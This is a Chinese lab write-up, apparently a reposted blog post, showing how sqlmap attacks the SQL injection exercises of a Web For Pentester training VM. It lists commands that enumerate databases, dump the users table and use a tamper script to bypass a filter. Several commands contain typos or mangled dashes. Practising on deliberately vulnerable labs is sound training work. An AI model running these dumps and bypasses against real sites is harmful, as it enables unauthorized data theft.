首页 > 数据库技术 > 详细

sqlmap注入-Web For Pentester

时间:2019-07-21 09:41:17      阅读:152      评论:0      收藏:0      [点我收藏+]

sqlmap注入-Web For Pentester

 一、要求

使用sqlmap注入,测试pentester的web页面漏洞

二、环境

Pentester网站,服务器ip地址为192.168.202.128

 技术分享图片

步骤

1.example1注入

a.查询当前数据库:

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example1.php?

name=root" –dbs

 技术分享图片

b.查询数据库对应的表

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example1.php?

name=root" -D exercises –tables

 技术分享图片

c.查询表内容

 技术分享图片

技术分享图片

 

2.example2注入

a.查看example2当前数据库

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?

name=root –dbs出现报错,执行绕过脚本语句

root@kali:~#:sqlmap -u 192.168.202.128/sqli/example2.php?

name=root--dbs --tamper=space2comment.py -v 

 技术分享图片

b.查看表信息

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?

name=root -D exercises --tables

 技术分享图片

c.查看表下内容

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?

name=root -D exercise -T users --dump

 技术分享图片

3.example3注入

a.查看example3当前数据库

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?

name=root –dbs出现报错,执行绕过脚本语句

root@kali:~#:sqlmap -u 192.168.202.128/sqli/example3.php?

name=root--dbs --tamper=space2comment.py -v 

 技术分享图片

b.查看表信息

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?

name=root -D exercises --tables

 技术分享图片

c.查看表下内容

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?

name=root -D exercise -T users --dump

 技术分享图片

4.example4注入

(由网址http://192.168.202.128/sqli/example4.php?id=2可以看出example4为数字型注入)

a.查看数据库

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" --dbs

 技术分享图片

b.查看表信息

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" -D exercises --tables

 技术分享图片

c.查看表下内容

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" -D exercises -T users --dump

 技术分享图片

5.example5注入

(由网址http://192.168.202.128/sqli/example5.php?id=2可以看出example5为数字型注入)

a.查看当前数据库

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" --dbs

 技术分享图片

b.查看表信息

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" –D exercise  --tables

 技术分享图片

c.查看表下相关信息

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" –D exercise  -T users  --dump

 技术分享图片

 

sqlmap注入-Web For Pentester

原文:https://www.cnblogs.com/loopkep/p/11219988.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!